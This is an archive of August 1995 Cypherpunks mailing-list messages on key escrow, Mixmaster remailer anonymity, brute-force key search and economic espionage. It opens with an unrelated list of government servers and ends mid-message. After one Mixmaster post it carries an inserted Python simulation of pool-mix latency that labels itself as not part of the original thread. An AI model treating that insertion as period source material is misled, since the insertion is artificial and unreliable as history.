United States Military & Defense Laboratory Servers

   AHPCRC (Army High Performance Computing Research
      Center)
   ARPA (Advanced Research Projects Agency)
   BMDO (Ballistic Missile Defense Organization Test Data
      Centers)
   LABLINK (U.S. Department of Defense Laboratory System)
   NRL (The Naval Research Laboratory)
   RL (USAF Rome Laboratory for C41 Technology)


International Intelligence and Law Enforcement Agency
Servers

   FORENSICS (The Forensic Web, Canada)
   UKPFW (UK Police and Forensic Web)
   RSB (Home Office Research and Statistics Department,
      UK)
   UNCPCJ (United Nations Crime Prevention & Criminal
      Justice)


NATO and International Military Agency Servers

   DRA (Defence Research Agency, United Kingdom)
   DREO (Defense Research Establishment, Ottawa, Canada)
   NATO (North Atlantic Treaty Organization)
   SACLANT (Supreme Allied Commander, Atlantic)
         
   
United States Regulatory Agency Servers

   EPA (U.S. Environmental Protection Agency)
   FAA (Federal Aviation Administration Technical Center)
   FCC (Federal Communications Commission)
   FTC (Federal Trade Commission)
   NRC (Nuclear Regulatory Commission)
   SEC (Securities and Exchange Commission)


United States Government Agency Servers

   CDC (Centers for Disease Control and Prevention)
   CENSUS (U.S. Department of Commerce Bureau of the
      Census)
   CONGRESS (U.S. House of Representatives)
   CUSTOMS (U.S. Customs Service)
   DHHS (U.S. Department of Health and Human Services)
   DOE (U.S. Department of Energy National Laboratories
      & Programs)
   DOSFAN (Department of State Foreign Affairs Network)
   EXECUTIVE (The White House)
   FDIC (Federal Deposit Insurance Corporation)
   FEMA (Federal Emergency Management Agency)
   GPO (U.S. Government Printing Office)
   GSA (U.S. General Services Administration)
   HPCC (NOAA High Performance Computing and
      Communications)
   IRS (Internal Revenue Service)
   JUSTICE (Justice Department)
   NARA (National Archives and Records Administration)
   NASA (National Aeronautics and Space Administration)
   NIMH (National Institute of Mental Health)
   NOAA (National Oceanic & Atmospheric Administration)
   NSF (National Science Foundation)
   NTIS (National Technical Information Service)
   SBA (Small Business Administration)
   NEW (8/16/95)      
   SEL (Space Environment Laboratory)
   TREASURY (Treasury Department)
   USCODE (U.S. House of Representatives Internet Law
      Library U.S. Code)

_______________________________________________________

   AJAX maintained and monitored by Sagal Computer
   Systems.

   E-Mail suggestions, additions, comments or corrections
   to sagal@interport.net












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 30 Aug 95 19:55:00 PDT
To: cypherpunks@toad.com
Subject: Re: NIST Key Escrow meeting
Message-ID: <v02120d05ac6ae2d07614@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:51 8/30/95, Flame Remailer wrote:
>Subject: NIST Key Escrow Meeting Discussion Papers
>
>Key Escrow Issues Meeting, September 6-7, 1995
>Discussion Paper #1

[Old and new GAK requirements elided]
>With your input, we are hopeful that this effort will lead to
>definitive criteria, which will facilitate the development of
>exportable products and help minimize the time required to obtain
>export licenses.  The Administration seeks to finalize such
>criteria and make formal conforming modifications to the export
>regulations before the end of 1995.
>
>
>Note:  These issues will be discussed at the Key Escrow Issues
>Meeting to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at
>the National Institute of Standards and Technology (Gaithersburg,
>Maryland).  The meeting will be open to the public, although
>seating is limited.  Advance registration is requested, please
>contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e-
>mail: carlton@micf.nist.gov.

Will any Cypherpunks attend this meeting? I sure hope we get to make our
ideas known.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alano@teleport.com (Alan Olsen) (by way of Alan Olsen <alano@teleport.com>)
Date: Wed, 30 Aug 95 20:54:13 PDT
To: cypherpunks@toad.com
Subject: [comp.security.unix] Advice on password security guidelines
Message-ID: <199508310353.UAA29997@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


I found this on alt.humor.best-of.usenet.  It seemed like something that
would be appreciated here.  (And it is not that far off topic.)

Enjoy!

-----------------------------------------------------------

In alt.humor.best-of-usenet, Artur Pioro <artur@thp2.if.uj.edu.pl>
wrote:

>From: Paul Ashton <paul@argo.demon.co.uk>
>Newsgroups: comp.security.unix
>Subject: Advice on password security guidelines

>Hi,
>my boss has asked me for comments and improvements on his new password
>security policy. To me, it seems a bit severe. If anyone can offer any
>additional suggestions please do, here goes...

>For immediate issue:
>Password changing guidelines V2.2b

>Due to new security policies, the following guidelines have
>been issued to assist in choosing new passwords. Please follow
>them closely.

>Passwords must conform to at least 21 of the following attributes.

>1.  Minimum length 8 characters
>2.  Not in any dictionary.
>3.  No word or phrase bearing any connection to the holder.
>4.  Containing no characters in the ASCII character set.
>5.  No characters typeable on a Sun type 5 keyboard
>6.  No subset of one character or more must have appeared on
>    Usenet news, /dev/mem, rand(3), or the King James bible (version 0.1alpha)
>7.  Must be quantum theoretically secure, i.e. must automatically change
>    if observed (to protect against net sniffing).
>8.  Binary representation must not contain any of the sequences 00 01 10 11,
>    commonly known about in hacker circles.
>9.  Be provably different from all other passwords on the internet.
>10. Not be representable in any human language or written script.
>11. Colour passwords must use a minimum 32 bit palette.
>12. Changed prior to every use.
>13. Resistant to revelation under threat of physical violence.
>14. Contain tissue samples of at least 3 vital organs.
>15. Incontrovertible by OJ Simpson's lawyers.
>16. Undecodable by virtue of application of 0 way hash function.
>17. Odourless, silent, invisible, tasteless, weightless, shapeless, lacking
>    form and inert.
>18. Contain non-linear random S-boxes (without a backdoor).
>19. Self-escrowable to enable authorities to capture kiddie-porn people
>    and baddies but not the goodies ("but we'll only decode it with a
>    court order, honest").
>20. Not decryptable by exhaustive application of possible one time pads.

>Due to the severity of the restrictions, if the password is entered
>incorrectly 3 times at login time, you will be asked if you would like to
>pick a new one.

>Please add guidelines to the above and adjust the minimum conformation
>requirement, if applicable.

>--
>Moderators accept or reject articles based solely on the criteria posted
>in the Frequently Asked Questions. Article content is the responsibility
>of the submittor.  Submit articles to ahbou-sub@acpub.duke.edu. To write 
>to the moderators, send mail to ahbou-mod@acpub.duke.edu. 



|         Spam is the Devil's toothpaste!         | alano@teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - Black Art | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Thu, 31 Aug 95 01:47:27 PDT
To: CYPHERPUNKS@toad.com
Subject: Poisson numbers for random keyspace assignment
Message-ID: <8B0251E.00030003C4.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


                  [Great statistical summary deleted]

TC> * For opportunistic attacks on keys in challenges, the odds are 95% that a
TC> key will be found with only twice the total effort (or time) using a
TC> totally random method of picking up keyspace to search.

  The odds can be improved somewhat by scaling the granularity of the
sweep to the size of the sweep. (Align larger chunks on large-chunk
boundaries, eliminating the chance of overlap with other large chunks.)

TC> * This is probably good enough. (And if one only wants to be 90% sure of
TC> finding the key, even less effort is needed.)

  The best advantage of the random method is that it allows people to
participate completely anonymously, as there is nothing to report save
the Eureka!, and that can be done through a remailer anyway. When the
challenge is solved, everyone can stop cracking.

       It is one thing to work on an academic exercise, but the =real=
     test is how well the resources could actually be marshalled for a
     =real= attack. The requirement of leaving an audit trail to
     participate reduces the supply of volunteers. This approach can not
     be challenged as unrealistic.

  The whole thing can be managed via Imail, which I must point out to
you Totally Connected People, is the least-common denominator for
participation here. You have =lots= of people out here who would like to
join the Cypherpunks Brute Squad (We gotta get T-shirts for this one!)
but don't have WWW access.




 * John was a complete D**k, until Lorena got through with him.
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 30 Aug 95 22:11:06 PDT
To: cypherpunks@toad.com
Subject: Economic Espionage?
Message-ID: <ac6a9205000210049586@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:25 AM 8/31/95, Tatu Ylonen wrote:
>> >It was said that Pres. Clinton had given a speech while
>> >visiting the  CIA HQ in Langley/Virginia. He allegedly
>> >said in this speech that obtaining  industrial
>> >informations has the highest priority and this were the
>> >new  task for the spies.
>
>There was a fairly large article about this in Helsingin Sanomat, the
>largest newspaper in Finland, some weeks ago.  It was quoted as being
>originally from the New York Times.  (I have the clip saved at home
>and can check the date if anyone is interested.)
>
>I do find it rather shocking that the most powerful country in the
>world sets industrial espionage as the primary task of their
>intelligence services.

What confirmation can you give us for this statement?

I'd like to see the actual comments, not just second-hand reports.

The issue of economic surveillance has come up several times, and I know of
no formal policy to institute such a program. The U.S., with generally
multiple competitors in each market, would have a hard time figuring out
who to tell "foreign secrets" to. Would Ford be told? Or just General
Motors? What about companies with operations in multiple countries?

Former DIRNSA (Director of the NSA) William Odom has said repeatedly that
economic espionage cannot plausibly be a central task of the NSA.

Before anyone accuses me of being an apologist for the NSA (usually these
claims arrive anonymously), I've been looking for evidence of an economic
intelligence role or mission of the U.S. intelligence agencies for more
than 7 years.

Let's see some evidence.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sam Quigley <poodge@econ.Berkeley.EDU>
Date: Wed, 30 Aug 95 22:23:09 PDT
To: cypherpunks@toad.com
Subject: yabc
Message-ID: <199508310523.WAA21036@quesnay.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Hi.

I'm writing a replacement for brloop/brclient in perl, one with full
SKSP compatibility, and one which is easily extensible and more
straightforward than the original br* code...

What would be some useful features to include in the code?  I'm
attempting to make it more friendly, more "intelligent", etc -- the
whole shebang.  It would be reasonably easy to, as someone here
suggested, have the program start the keyfetch process before the last
key segment finished, or whatever -- the question is, is that worth
it?  I'm also including code to make it possible for the user to
specify how much time she wants to give the search, etc...  It should
be possible to include code for a very simple sort of farming setup
(at least something to allow easy remote launches of the brute code)..

Would all this be useful to other people?  What features would make it
more so?

Also, it seems that there have been some "extensions" to the SKSP
protocol...  For instance, suddenly there are different machines
dedicated just to ACKs, etc.  Is there a central repository of these
changes?  (Have these changes even been publicly reviewed?)

(the program, in case you couldn't deduce it from the title of this
message is to be "yabc" - yet another brute* client.  oh how so clever
and original, no?)

- -sq

-----BEGIN PGP SIGNATURE-----
Version: 2.6

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 30 Aug 95 19:54:59 PDT
To: cypherpunks@toad.com
Subject: Re: Is the book Network Security any good?
In-Reply-To: <9508310053.AA01365@cantina.verity.com>
Message-ID: <9508310253.AA09578@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Has anyone read the book "Network Security Private Communication in a 
>PUBLIC World" yet?  It's by Charlie Kaufman, Radia Perlman, and Mike
>Speciner, and has a copyright date of this year.

It's pretty good on security and structure of protocols. Makes a good companion to 
the Schneier book. I use it frequently.

It does have some very irritating assertions concerning ASN.1 however, 
specifically concerning its use in Kerberos. I consider Kerberos's use of ASN.1 
to be far superior than the alternative suggested which is pure lossage. 
Lambasting the use of ASN.1 is fair game but arguments over wasted bytes miss the 
point of ASN.1 and the BER encoding entirely.

It would make a useful course book. 

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Wed, 30 Aug 95 20:08:12 PDT
To: Hadmut Danisch <danisch@ira.uka.de>
Subject: Re: CIA & Espionage
In-Reply-To: <9508302127.AA00492@elysion.iaks.ira.uka.de>
Message-ID: <Pine.SUN.3.91.950830230618.22183B-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 30 Aug 1995, Hadmut Danisch wrote:

> Date: Wed, 30 Aug 1995 23:27:23 +0200
> From: Hadmut Danisch <danisch@ira.uka.de>
> To: cypherpunks@toad.com
> Subject: Re: CIA & Espionage
> 
> 
> > because of the source of confirmation, but because it fits right into the 
> > direction most of the intelligence agencies have been taking since the 
> > revelation that the French had won out a multi-billion $ contract for air 
> > traffic control because the French service had, through various espionage 
> > methods, determined the U.S. bidding position and such.
> 
> We have a similar story in Germany. Some time ago, an Asian country
> (South Korea if I remember well) was looking for a high speed
> passenger train. They had to choose between the German ICE and the
> French TGV. Both trains  have nearly the same quality from technical
> point of view. Korea decided to take the cheaper one. 
> 
> The Germans gave an offer and just half an hour later the French gave
> an offer slightly (just a little bit) cheaper than the Germans. France
> got the order (over 10^9 D-Mark). The German headquarter had
> instructed their Asian office to give the offer with a certain price
> through unprotected fax. It is said that the fax was wiretapped by the
> French secret service (allegedly)...

The French are particularly notorious for this.

> 
> Hadmut
> 

Question:  How many pounds of explosive were put in the Citroen which 
leveled the embassy in a massive explosion?

Answer: Zero.


00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Wed, 30 Aug 95 20:13:07 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: NIST Key Escrow meeting
In-Reply-To: <v02120d05ac6ae2d07614@[192.0.2.1]>
Message-ID: <Pine.SUN.3.91.950830231153.22183C-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 30 Aug 1995, Lucky Green wrote:

> Date: Wed, 30 Aug 1995 19:58:52 -0800
> From: Lucky Green <shamrock@netcom.com>
> To: cypherpunks@toad.com
> Subject: Re: NIST Key Escrow meeting
> 
> At 7:51 8/30/95, Flame Remailer wrote:
> >Subject: NIST Key Escrow Meeting Discussion Papers
> >
> >Key Escrow Issues Meeting, September 6-7, 1995
> >Discussion Paper #1
> 
> [Old and new GAK requirements elided]
> >With your input, we are hopeful that this effort will lead to
> >definitive criteria, which will facilitate the development of
> >exportable products and help minimize the time required to obtain
> >export licenses.  The Administration seeks to finalize such
> >criteria and make formal conforming modifications to the export
> >regulations before the end of 1995.
> >
> >
> >Note:  These issues will be discussed at the Key Escrow Issues
> >Meeting to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at
> >the National Institute of Standards and Technology (Gaithersburg,
> >Maryland).  The meeting will be open to the public, although
> >seating is limited.  Advance registration is requested, please
> >contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e-
> >mail: carlton@micf.nist.gov.
> 
> Will any Cypherpunks attend this meeting? I sure hope we get to make our
> ideas known.

I will attempt to attend, but I will not be speaking, sorry.

At the least, if I can make it, I will try to post a summary.

> 
> -- Lucky Green <mailto:shamrock@netcom.com>
>    PGP encrypted mail preferred.
> 
> 
> 

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Wed, 30 Aug 95 14:27:59 PDT
To: cypherpunks@toad.com
Subject: Re: CIA & Espionage
Message-ID: <9508302127.AA00492@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



> because of the source of confirmation, but because it fits right into the 
> direction most of the intelligence agencies have been taking since the 
> revelation that the French had won out a multi-billion $ contract for air 
> traffic control because the French service had, through various espionage 
> methods, determined the U.S. bidding position and such.

We have a similar story in Germany. Some time ago, an Asian country
(South Korea if I remember well) was looking for a high speed
passenger train. They had to choose between the German ICE and the
French TGV. Both trains  have nearly the same quality from technical
point of view. Korea decided to take the cheaper one. 

The Germans gave an offer and just half an hour later the French gave
an offer slightly (just a little bit) cheaper than the Germans. France
got the order (over 10^9 D-Mark). The German headquarter had
instructed their Asian office to give the offer with a certain price
through unprotected fax. It is said that the fax was wiretapped by the
French secret service (allegedly)...

Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 30 Aug 95 20:33:58 PDT
To: owner-cypherpunks@toad.com
Subject: Re: Is the book Network Security any good?
Message-ID: <9508310333.AA12779@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>It does have some very irritating assertions concerning ASN.1 however, 
>specifically concerning its use in Kerberos. I consider Kerberos's use of ASN.1 
>to be far superior than the alternative suggested which is pure lossage. 

What was the alternative suggestion? Many KRB5 folks, including Ted Ts'o,
have said that using ASN.1 is the biggest mistake in the KRB5 protocol.

>Lambasting the use of ASN.1 is fair game but arguments over wasted bytes miss the 
>point of ASN.1 and the BER encoding entirely.

Hunh?  The points of ASN.1 and BER (DER? -- a little mavros joke :) 
*are* irrelevant to Kerberos.  Wasted bytes in your security protocol
should most definitely be a concern.

Charlie and Radia are hot-shits; I don't know the other guy.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Ingle <inglem@adnetsol.com>
Date: Wed, 30 Aug 95 23:41:49 PDT
To: cypherpunks@toad.com
Subject: RSA Secure (disk encryption)
Message-ID: <199508310641.XAA00285@cryptical.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


RSA's home page (http://www.rsa.com) has a demo version of RSA Secure.
This is a disk/directory encryption program that serves the same
purpose as Secure Drive and SFS. According to their description, it
allows you to select only certain files to be encrypted, and uses
80-bit RC4. The demo/export version is only 40 bits.

It also has optional key escrow. You can choose to escrow a key by
secret-sharing it and giving pieces to various people. There is a
threshold system so m of n people have to cooperate to decrypt it.

						Mike



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Wed, 30 Aug 95 20:46:16 PDT
To: cypherpunks@toad.com
Subject: Re: Mixmaster Security Issues
In-Reply-To: <199508310117.SAA20828@infinity.c2.org>
Message-ID: <m0so0Zi-000H93C@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Wed, 30 Aug 1995 18:17:02 -0700

Can't answer all of your questions, but I'll answer the ones I can,
which will save time for someone else to answer the rest of them.

   Apart from thwarting traffic analysis attacks, how does the security
   of a Mixmaster Type II remailer packet compare to that of a
   PGP-chained Type I message?

Well, on the one hand, PGP uses IDEA, which is arguably better than
triple-DES, but PGP also only uses the key length(s) of choice, which
is to say that if you use the minimum length, you have very little
security.  Also, Mixmaster packets remain the same length from hop to
hop, so they are harder to track.

Not every PGP remailer reorders.

   For example, is each remailer in the path limited to knowing only
   the next remailer in the path?

And the previous one.  For PGP-chaining, that tells you a lot, because
you can observe the message length getting smaller.

   Is there any way for a remailer (except for the first and last in
   the chain) to know how many hops have already occurred or how many
   remain?

No.  The hop list is a constant length, and the list is back-encrypted
through the chain, so that all you can ever know is the next hop,
which the previous remailer couldn't know because it couldn't decrypt
it.

And not even the first or last necessarily!  Both the source and
destination are running Mixmaster (by definition).  There's no reason
why mixmaster must remail -- eventually it delivers.  And someone
sourced the mail using Mixmaster.  If the source or destination is not
on an advertised remailer, or the destination was non-local to the
destination remailer, then it's pretty obvious that someone on that host
is an endpoint.  But that's one of the beauties of Mixmaster --
there's a large security increase in setting it up as a remailer and
advertising it.

   Would any security be lost if Type I and II technology were combined
   and a PGP-chained Type I packet were initially sent via Mixmaster?

Security is increased.

   Is my math correct in surmising that chaining a message through five
   remailers, each with a reordering pool of five messages, could mean
   that the message eventually leaves the chain as one of 5^5 (3125)
   possible messages?

You're ignoring the case where it is to/from a machine that runs a
public remailer.

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | America neither a Christian,
Potsdam, NY 13676 |  Jewish, Islamic, nor atheist (etc&) nation.  This is good.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Thu, 31 Aug 95 01:47:25 PDT
To: CYPHERPUNKS@toad.com
Subject: O.J. ObCrypto:  Fuhrman's Folly Fans Fakery Fears...
Message-ID: <8B02596.00030003C5.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain



  Regardless of whether Ito allows the tapes into evidence, the public
has heard a LEO matter-of-factly discussing the fabrication of evidence
against US citizens. We should take advantage of this, by connecting the
Fuhrman/Good Ole Boys from BFART bit, and GACK.

  If my private key must be escrowed with Lawn Forcement Agencies, the
very real possibility exists of a Fuhrman using it to forge evidence
against me. In =any= Key Escrow arrangement (including the non-
government variety preferred by 4 out of 5 Cypherpunks in a recent
survey) there must be a division between encryption keys and signature
keys.

  I recommend that anyone who will be using escrowed keys generate two
pairs: First, the signature key, including in the userid some kind of
[sig use] identifier (we should settle on a standard abbreviation for
this) followed by the encryption key. This way, when a person gets your
pubkeys, they get the encryption key =last=, which gets it searched
first whenever they PGP -e... something.

  Whatever arrangements are made for escrowing my encryption key,
=nobody= gets my signature key. If I am fired, quit, become brain
damaged or dead, my key can never be used by anyone to implicate me in
any criminal activity.



  Please don't mention to anyone the fact that my signature key can be
used to send me something that even the escrow agents can't read....






 *  
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Thu, 31 Aug 95 01:14:28 PDT
To: cypherpunks@toad.com
Subject: Re: Mixmaster Security Issues
Message-ID: <ac6b18ea00021004679f@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 6:17 PM 8/30/95, hroller Mixmaster wrote:
>Apart from thwarting traffic analysis attacks, how does the security
>of a Mixmaster Type II remailer packet compare to that of a
>PGP-chained Type I message?
>

There is no way in which the security of Mixmaster messages is LESS than
that of type I (cypherpunk) remailers. 

>For example, is each remailer in the path limited to knowing only
>the next remailer in the path?  Is there any way for a remailer
>(except for the first and last in the chain) to know how many hops
>have already occurred or how many remain?  Is there a session key
>chosen via an RNG?  If so, how random is the RNG?  Is it seeded from
>a pseudo-random source that's at least as secure as measuring
>keystroke latencies, as PGP does?

Yes, each remailer is limited to knowing the previous and next
destinations. 

A Mixmaster remailer can only tell if it is first, last, or somewhere in
the middle. No information is leaked about position in the chain. There is
a hard limit of 20 hops. 


>Lance Cottrell's original "remailer essay" which proposed the Type
>II concept envisioned, if I'm not mistaken, the use of PGP
>technology to do the actual encryptions.  Now it seems that another,
>seemingly proprietary, implementation of RSAREF was used, instead.
>What was the reason for this change?

Version 1.0 (which was released but not widely used or promoted) used
PGPTools by Pr0duct Cypher. This is a library which provides hooks for most
of the major PGP routines. The main problem with PGPTools is that I could
not get it to compile on anything but a SUN. The other problem was that it
was difficult to control the encryption so I could avoid any change in the
size of information when it was encrypted. RSAREF is very portable, robust,
supported, easy to work with, and was easy to use for fine control of the
encryption process. RSAREF is also much less of a black box to me. I can
understand what it is doing in detail. 

>
>Would any security be lost if Type I and II technology were combined
>and a PGP-chained Type I packet were initially sent via Mixmaster?
>This would seem to provide the necessary protection against
>traffic analysis while bypassing any *POSSIBLE* hidden weaknesses in
>Mixmaster.  IOW, if the outer Mixmaster "envelope" were "steamed
>open", perhaps based on some hidden weakness in Mixmaster, the
>inner, nested PGP envelope(s) would remain intact.
>

Because of the message size limitations there are some advantages to
sending the mixmaster chain through some type 1 remailers first, rather
than sending a type 1 message in a Mixmaster packet.

>BTW, what volume of message traffic is the Mixmaster network of
>remailers currently handling?  Is much cover traffic necessary to
>minimize delays while providing enough reordering to thwart traffic
>analysis?  (IOW, so a remailer with a reordering pool size of five
>messages, and averaging one REAL message a day, wouldn't have to
>keep a message for an average of five days before sending it on its
>next hop, as a worst-case scenario).
>

It is very difficult to know what fraction of the traffic I see is cover. I
generate some cover traffic myself, and I know some others do as well.
Right now a reordering pool of 5 messages results in a latency of about 30
min. Mixmaster is no longer a small fraction of the remailer market. A
majority of all public remailers support Mixmaster. 

>Is my math correct in surmising that chaining a message through five
>remailers, each with a reordering pool of five messages, could mean
>that the message eventually leaves the chain as one of 5^5 (3125)
>possible messages?  (My math is a bit weak, so please feel free to
>correct my methodology, if necessary.)  If so, does that work in
>reverse?  Could a given output message that finally surfaced in the
>clear be narrowed down to one of 3125 Mixmaster input messages
>through traffic analysis?  Or would the fact that the attacker
>didn't know the exact number of hops utilized significantly increase
>the odds against identifying the sender?  What effect, if any, would
>increasing the number of available remailers have on traffic
>analysis?

This is not quite correct, at each hop your message could have gone to any
remailer at all. There are now 16 Mixmaster remailers in operation. If you
have two good remailers in your chain (not run by the enemy), then a given
message into the system is probably one of the messages that emerges
between 10 Min and several hours later (with some complex probability
distribution over that time). Note that because of the way the reordering
is done, messages could stay in the pool forever, but this is exponentially
less likely with time.

It turns out that this is good security for one message, but is much less
secure if you continue to communicate with the same person for some time.
Then the attacker can look for correlations between your sending a message,
and everyone who receives them. After several messages in one month, you
will stand out, unless you send cover messages regularly, so you correlate
with everyone all the time (destroying any information about who you
actually correspond with). 

        -Lance
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------
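
The reordering-pool latency described in the message above, as an added example that is not part of the original post and is not Mixmaster's code. It assumes a simple pool mix in which every arriving message joins a pool of fixed size and one uniformly chosen message is then sent; the post does not give the algorithm in this detail, and all names below are constructed.

```python
import random
from fractions import Fraction


def survival_probability(pool_size, rounds):
    """Exact chance a message is still pooled after `rounds` send rounds.

    Each round the message is one of pool_size + 1 candidates and exactly
    one is sent, so it survives a round with probability N / (N + 1).
    """
    return Fraction(pool_size, pool_size + 1) ** rounds


def expected_rounds(pool_size):
    """Mean number of rounds until a message is sent (geometric distribution)."""
    return pool_size + 1


def simulate_pool_mix(pool_size, arrivals, seed):
    """Simulate the assumed pool mix; return per-message delays in rounds.

    A delay of 1 means the message was sent in the same round it arrived.
    Messages still pooled when the simulation ends are not counted.
    """
    rng = random.Random(seed)
    # Start with a full pool of dummy messages (id None) so that the pool
    # is already at its steady-state size when real traffic begins.
    pool = [(None, 0)] * pool_size
    delays = []
    for now in range(arrivals):
        pool.append((now, now))                       # new message joins
        msg_id, arrived = pool.pop(rng.randrange(len(pool)))
        if msg_id is not None:
            delays.append(now - arrived + 1)
    return delays


def empirical_survival(delays, rounds):
    """Observed fraction of messages that waited longer than `rounds`."""
    return sum(1 for d in delays if d > rounds) / len(delays)


if __name__ == "__main__":
    N = 5  # pool size quoted in the thread
    delays = simulate_pool_mix(N, arrivals=50_000, seed=1995)
    print("mean delay (rounds):", sum(delays) / len(delays),
          "expected:", expected_rounds(N))
    for r in (1, 5, 10, 20, 40):
        print(f"P(still pooled after {r:2d} rounds): "
              f"model {float(survival_probability(N, r)):.4f}  "
              f"simulated {empirical_survival(delays, r):.4f}")
```

The tail never reaches zero but shrinks by a factor of N/(N+1) per round, which is the "could stay in the pool forever, but exponentially less likely with time" behaviour under this model.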






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Thu, 31 Aug 95 01:14:31 PDT
To: cypherpunks@toad.com
Subject: Re: Mixmaster Security Issues
Message-ID: <ac6b1f9d03021004fa95@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:45 PM 8/30/95, Russell Nelson wrote:
>   Date: Wed, 30 Aug 1995 18:17:02 -0700
>
>Can't answer all of your questions, but I'll answer the ones I can,
>which will save time for someone else to answer the rest of them.
>
>   Apart from thwarting traffic analysis attacks, how does the security
>   of a Mixmaster Type II remailer packet compare to that of a
>   PGP-chained Type I message?
>
>Well, on the one hand, PGP uses IDEA, which is arguably better than
>triple-DES, but PGP also only uses the key length(s) of choice, which
>is to say that if you use the minimum length, you have very little
>security.  Also, Mixmaster packets remain the same length from hop to
>hop, so they are harder to track.

I am not sure this is the consensus opinion. Three key triple DES uses 168
bits of key, whereas IDEA only (only?!?) uses 128. DES is also much better
studied and understood. IDEA is still a young algorithm (though close to
the heart of every cypherpunk).

The rest of what you said looks good. Too bad I did not see it before I
typed my own answer ;)

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 31 Aug 95 02:33:01 PDT
To: cypherpunks@toad.com
Subject: Re: CIA & Espionage
Message-ID: <199508310930.CAA18043@ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> >It was said that Pres. Clinton had given a speech while 
>> >visiting the  CIA HQ in Langley/Virginia. He allegedly 
>> >said in this speech that obtaining  industrial 
>> >informations has the highest priority and this were the 
>> >new  task for the spies.

Did he really say the priority was stealing information from
other people, or only protecting Big American Companies from 
